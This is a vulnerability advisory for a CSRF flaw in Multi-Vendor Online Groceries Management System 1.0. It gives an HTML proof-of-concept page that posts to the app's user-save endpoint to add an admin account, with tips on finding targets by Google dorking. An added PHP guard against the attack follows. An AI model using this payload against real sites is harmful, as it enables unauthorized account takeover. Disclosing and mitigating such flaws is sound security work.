=============================================================================================================================================
| # Title     : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability                                                      |
| # Author    : indoushka                                                                                                                   |
| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip                                          |
=============================================================================================================================================

PoC:

[+] Dorking in Google or another search engine.

[+] This payload adds a new admin user.

[+] Save the payload as poc.html.

[+] Line 27: set your target URL.

[+] Payload:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>User Registration</title>
</head>
<body>

    <h2>User Registration</h2>
    <form id="userForm" enctype="multipart/form-data">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">
    </form>

    <script>
        function saveUser() {
            var form = document.getElementById('userForm');
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

            xhr.onload = function () {
                if (xhr.status === 200) {
                    alert('User saved successfully');
                } else {
                    alert('An error occurred while saving the user');
                }
            };

            xhr.send(formData);
        }
    </script>

</body>
</html>
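
[+] Mitigation sketch (added example, not part of the original advisory and not the application's own code): a guard that the handler behind classes/Users.php?f=save could run before writing a user record. It rejects requests that are not same-origin, not from a logged-in session, or missing a per-session token. APP_ORIGIN, the csrf_token field and the userdata session key are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical guard, not code from the application.
const APP_ORIGIN = 'http://localhost'; // assumption: origin of the test install in the PoC URL
const CSRF_FIELD = 'csrf_token';       // hypothetical hidden form field and session key

/** Normalise a URL or Origin header value to scheme://host[:port]; '' if unusable. */
function origin_of(string $value): string
{
    $p = parse_url($value);
    if (!is_array($p) || empty($p['scheme']) || empty($p['host'])) {
        return '';                     // also covers "Origin: null" from a file:// page
    }
    $port = isset($p['port']) ? ':' . $p['port'] : '';
    return strtolower($p['scheme'] . '://' . $p['host']) . $port;
}

/** Issue (once per session) the token that legitimate forms must echo back. */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_FIELD])) {
        $session[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_FIELD];
}

/** True only for a same-origin POST from a logged-in session carrying the token. */
function request_is_allowed(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if (origin_of($source) !== APP_ORIGIN) {
        return false;                  // cross-site, "null", or missing source header
    }
    if (empty($session['userdata'])) { // hypothetical key set at login
        return false;
    }
    $sent     = $post[CSRF_FIELD] ?? '';
    $expected = $session[CSRF_FIELD] ?? '';
    return is_string($sent) && is_string($expected)
        && $expected !== '' && hash_equals($expected, $sent);
}

// Usage at the top of the handler, before any user record is written:
// session_start();
// if (!request_is_allowed($_SERVER, $_POST, $_SESSION)) { http_response_code(403); exit; }
```

The legitimate admin form would embed csrf_token($_SESSION) in a hidden field named csrf_token; setting the session cookie with SameSite=Lax or Strict adds a second layer.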

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================